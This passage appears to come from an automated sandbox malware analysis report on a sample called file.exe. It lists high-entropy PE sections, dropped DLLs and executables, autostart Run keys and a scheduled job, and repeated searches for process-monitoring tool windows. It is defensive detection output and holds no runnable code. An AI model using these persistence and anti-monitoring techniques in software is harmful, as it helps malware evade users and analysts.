Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: cwtgiuyn
Source: explorti.exe.5.dr Static PE information: section name: mrbyzpwc
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: pcxsfzhs
Source: axplong.exe.8.dr Static PE information: section name: plzfkdac
Source: axplong.exe.8.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB536 push ecx; ret 0_2_6C5DB549
Source: file.exe Static PE information: section name: .text entropy: 7.814911045179817
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: entropy: 7.987749938508856
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: cwtgiuyn entropy: 7.952966002632842
Source: random[1].exe.0.dr Static PE information: section name: .text entropy: 7.814911045179817
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: entropy: 7.977259343253602
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.987749938508856
Source: explorti.exe.5.dr Static PE information: section name: cwtgiuyn entropy: 7.952966002632842
Source: axplong.exe.8.dr Static PE information: section name: entropy: 7.977259343253602
Source: axplong.exe.8.dr Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\userAKKKFBGDHJ.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\userAKKKFBGDHJ.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Creates job files (autostart)
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\userAKKKFBGDHJ.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
